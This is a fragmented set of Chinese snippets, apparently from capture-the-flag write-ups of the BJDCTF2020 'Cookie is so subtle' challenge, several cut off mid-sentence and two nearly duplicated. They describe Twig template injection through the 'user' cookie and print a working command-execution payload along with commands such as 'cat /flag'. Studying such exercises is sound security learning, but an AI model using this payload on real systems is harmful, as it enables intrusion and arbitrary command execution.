再执行cat /flag,得到flag。 注意,这里必须在抓包时修改cookie中的user值为exp,而不能直接在前端输入框直接输入exp(因为浏览器会自动进行url编码,导致不执行)。 参考:
能用的payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}} 因为题目是Cookie is so subtle,所以注入可能在Cooke中,之前我一直在post数据里面搞,后来用bp转发一次发现还有一次,正好在cookie后面有个user= poc: payload: 最后用 ls / 命令总是返回一个var 我佛...
Cookie_is_so_subtle! 前面也提示了cookie,猜测是要换成管理员cookie,用admin登陆后抓session发现有两个值: Cookie:PHPSESSID=b7f1da5a70fc1ad42d5652704ecda478;user=admin 其中phpsession没变更过,于是尝试用user注入,得到flag: POST/flag.phpHTTP/1.1Host:7d1705e1-9614-469f-b58c-83d7b1e01224.node4.bu...
BJDCTF2020 Cookie is so subtle 知识点 SSTI模板注入 Cookie注入 index.php hint.php 我们在hint.php中看到Why not take a closer look at cookies?,加上题目名字我们可以猜测这道题的漏洞点在cookie上面 我们通过burpsuite抓下包看一下cookie 页面提交后,cookie这里多了一个user=(msg you input),那么是不是可...
<title> Cookie_is_so_subtle! </title> 前面也提示了cookie,猜测是要换成管理员cookie,用admin登陆后抓session发现有两个值: Cookie: PHPSESSID=b7f1da5a70fc1ad42d5652704ecda478; user=admin 其中phpsession没变更过,于是尝试用user注入,得到flag: POST /flag.php HTTP/...